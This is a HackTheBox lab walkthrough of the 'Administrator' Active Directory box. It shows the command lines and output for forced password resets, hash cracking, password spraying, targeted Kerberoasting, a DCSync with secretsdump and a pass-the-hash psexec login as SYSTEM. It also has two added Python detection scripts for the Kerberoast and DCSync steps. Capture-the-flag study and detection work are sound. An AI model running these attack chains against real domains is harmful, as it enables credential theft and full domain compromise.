HackTheBox · Lab
Medium · Windows · Active Directory · Password Attacks

NOTES

ENUMERATION

### NMAP


```shell
nmap -sV -sC -T3 -p21,53,88,139,389,445,5989 $IP --open -oN files/administrator.nmapscan
Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-31 23:06 CEST
Nmap scan report for 10.10.11.42
Host is up (0.018s latency).
Not shown: 1 closed tcp port (reset)
PORT    STATE SERVICE       VERSION
21/tcp  open  ftp           Microsoft ftpd
| ftp-syst: 
|_  SYST: Windows_NT
53/tcp  open  domain        Simple DNS Plus
88/tcp  open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-09-01 04:06:34Z)
139/tcp open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: administrator.htb0., Site: Default-First-Site-Name)
445/tcp open  microsoft-ds?
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2025-09-01T04:06:38
|_  start_date: N/A
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
|_clock-skew: 6h59m59s
```


### Full enum done

FOOTHOLD

### Bloodhound next


Path:


[images: BloodHound path screenshots]

PRIVILEGE ESCALATION

### Force Change Password


```shell
❯ net rpc password 'michael' 'Password123!' -U 'administrator/olivia%ichliebedich' -S $IP
❯ net rpc password 'benjamin' 'Password123!' -U 'administrator/michael%Password123!' -S $IP
```


### FTP file found


```shell
❯ nxc ftp $IP -u $USER -p $PASS --ls               
FTP         10.10.11.42     21     10.10.11.42      [+] benjamin:Password123!
FTP         10.10.11.42     21     10.10.11.42      [*] Directory Listing
FTP         10.10.11.42     21     10.10.11.42      10-05-24  09:13AM                  952 Backup.psafe3
```


### Cracked with hashcat


```shell
Backup.psafe3:tekieromucho
```




Let's copy all the passwords and do a password spray for auth.


```shell
[+] administrator.htb\emily:UXLCI5iETUsIBoFVTj8yQFKoHjXmb
```


### Next path


[image: BloodHound path screenshot]


```shell
❯ targetedKerberoast.py -v -d 'administrator.htb' -u 'emily' -p 'UXLCI5iETUsIBoFVTj8yQFKoHjXmb' --request-user ethan
[*] Starting kerberoast attacks
[*] Attacking user (ethan)
[VERBOSE] SPN added successfully for (ethan)
[+] Printing hash for (ethan)
$krb5tgs$23$*ethan$ADMINISTRATOR.HTB$administrator.htb/ethan*$109b07aaa1c026b987eb4a9bef825cdf$...SNIP...
```


### Cracked with hashcat


```shell
$krb5tgs$23$*ethan$ADMINISTRATOR.HTB$administrator.htb/ethan*$109b07aaa1c026b987eb4a9bef825cdf$81d7d55a840b...SNIP...60e2cce17:limpbizkit
```

- limpbizkit
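
A detection-side view of the targeted Kerberoast step above, as an added example that is not part of the original notes: it correlates an SPN added to a user object (Security event 5136) with an RC4 service ticket request (event 4769, encryption type 0x17) for the same account shortly afterwards. The event dicts, the DN-to-account lookup and the five-minute window are constructed assumptions.

```python
from datetime import datetime, timedelta

RC4_HMAC = "0x17"        # etype 23, the "$krb5tgs$23$" prefix in the output above
VALUE_ADDED = "%%14674"  # OperationType of event 5136 when a value is added

# Constructed sample events, reduced to the fields the rule needs.
EVENTS = [
    {"id": 5136, "time": "2025-09-01T04:10:00", "SubjectUserName": "emily",
     "ObjectClass": "user", "ObjectDN": "CN=ethan,CN=Users,DC=administrator,DC=htb",
     "AttributeLDAPDisplayName": "servicePrincipalName", "OperationType": VALUE_ADDED},
    {"id": 4769, "time": "2025-09-01T04:10:02", "TargetUserName": "emily@ADMINISTRATOR.HTB",
     "ServiceName": "ethan", "TicketEncryptionType": "0x17"},
    # Benign: AES ticket for the DC's own machine account.
    {"id": 4769, "time": "2025-09-01T04:11:00", "TargetUserName": "olivia@ADMINISTRATOR.HTB",
     "ServiceName": "DC$", "TicketEncryptionType": "0x12"},
    # Benign: SPN registered on a computer object, never requested with RC4.
    {"id": 5136, "time": "2025-09-01T04:12:00", "SubjectUserName": "DC$",
     "ObjectClass": "computer", "ObjectDN": "CN=DC,OU=Domain Controllers,DC=administrator,DC=htb",
     "AttributeLDAPDisplayName": "servicePrincipalName", "OperationType": VALUE_ADDED},
]
# DN -> sAMAccountName lookup (assumed to come from a directory export).
DN_TO_SAM = {"CN=ethan,CN=Users,DC=administrator,DC=htb": "ethan"}


def find_targeted_kerberoast(events, dn_to_sam, window=timedelta(minutes=5)):
    """Return (writer, target, requester) for every SPN added to a user object
    that is followed within `window` by an RC4 service ticket for that user."""
    spn_writes, hits = [], []
    for ev in sorted(events, key=lambda e: e["time"]):
        ts = datetime.fromisoformat(ev["time"])
        if ev["id"] == 5136:
            is_spn_add = (ev["ObjectClass"] == "user"
                          and ev["AttributeLDAPDisplayName"].lower() == "serviceprincipalname"
                          and ev["OperationType"] == VALUE_ADDED)
            sam = dn_to_sam.get(ev["ObjectDN"])
            if is_spn_add and sam:
                spn_writes.append((ts, sam.lower(), ev["SubjectUserName"]))
        elif ev["id"] == 4769 and ev["TicketEncryptionType"].lower() == RC4_HMAC:
            for written_at, sam, writer in spn_writes:
                if sam == ev["ServiceName"].lower() and ts - written_at <= window:
                    hits.append((writer, sam, ev["TargetUserName"]))
    return hits


if __name__ == "__main__":
    for writer, target, requester in find_targeted_kerberoast(EVENTS, DN_TO_SAM):
        print(f"SPN added to {target} by {writer}, RC4 ticket requested by {requester}")
```

Event 5136 is only logged when Directory Service Changes auditing is enabled and the object carries a matching SACL.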

### DCSync


```shell
❯ secretsdump.py 'administrator.htb'/ethan:limpbizkit@$IP
Impacket v0.13.0.dev0+20250721.105211.7561038 - Copyright Fortra, LLC and its affiliated companies 

[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied 
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
[*] Kerberos keys grabbed
[*] Cleaning up...
```
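
How the DRSUAPI replication above looks from the defender's side, as an added example that is not part of the original notes: it scans Security event 4662 records for the directory replication control-access rights and reports accounts that exercised them without being an expected replication principal. The event dicts and the allowlist are constructed assumptions.

```python
import re
from collections import defaultdict

# Control-access right GUIDs on the domain object that gate directory replication.
REPL_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}
GUID_RE = re.compile(r"\{([0-9a-fA-F-]{36})\}")
CONTROL_ACCESS = 0x100  # AccessMask bit for extended (control access) rights

# Constructed sample 4662 events, reduced to the fields the rule needs.
EVENTS = [
    {"SubjectUserName": "DC$", "AccessMask": "0x100",
     "Properties": "%%7688 {1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {19195a5b-6da0-11d0-afd3-00c04fd930c9}"},
    {"SubjectUserName": "ethan", "AccessMask": "0x100",
     "Properties": "%%7688 {1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {19195a5b-6da0-11d0-afd3-00c04fd930c9}"},
    {"SubjectUserName": "ethan", "AccessMask": "0x100",
     "Properties": "%%7688 {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2} {19195a5b-6da0-11d0-afd3-00c04fd930c9}"},
    # Benign: ordinary property read on a user object.
    {"SubjectUserName": "olivia", "AccessMask": "0x10",
     "Properties": "%%7684 {bf967aba-0de6-11d0-a285-00aa003049e2}"},
]


def detect_dcsync(events, replication_principals):
    """Map each non-allowlisted account to the replication rights it exercised,
    keeping only accounts that used Get-Changes-All (the right that returns secrets)."""
    allowed = {p.lower() for p in replication_principals}
    used = defaultdict(set)
    for ev in events:
        if (int(ev["AccessMask"], 16) & CONTROL_ACCESS) == 0:
            continue  # not a control-access operation
        subject = ev["SubjectUserName"].lower()
        if subject in allowed:
            continue  # expected replication traffic, e.g. domain controllers
        for guid in GUID_RE.findall(ev["Properties"]):
            right = REPL_RIGHTS.get(guid.lower())
            if right:
                used[subject].add(right)
    return {s: sorted(r) for s, r in used.items()
            if "DS-Replication-Get-Changes-All" in r}


if __name__ == "__main__":
    for account, rights in detect_dcsync(EVENTS, {"DC$"}).items():
        print(f"replication rights used by non-DC account {account}: {', '.join(rights)}")
```

The allowlist should hold every domain controller machine account plus any directory synchronisation service account that legitimately replicates.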

SYSTEM OWNAGE

### Log in to get NT AUTHORITY\SYSTEM


```shell
❯ psexec.py $USER@$IP -hashes $FULLHASH
Impacket v0.13.0.dev0+20250721.105211.7561038 - Copyright Fortra, LLC and its affiliated companies 

[*] Requesting shares on 10.10.11.42.....
[*] Found writable share ADMIN$
[*] Uploading file vpdxiKca.exe
[*] Opening SVCManager on 10.10.11.42.....
[*] Creating service zBIF on 10.10.11.42.....
[*] Starting service zBIF.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.20348.2762]
(c) Microsoft Corporation. All rights reserved.

C:\Windows\system32> whoami
nt authority\system
```

SCOPE

| IP | HOSTNAME | DOMAIN NAME | OS |
| --- | --- | --- | --- |
| 10.10.11.42 | DC | administrator.htb | Windows Server 2022 Build 20348 x64 |


ⓒ 0xNRG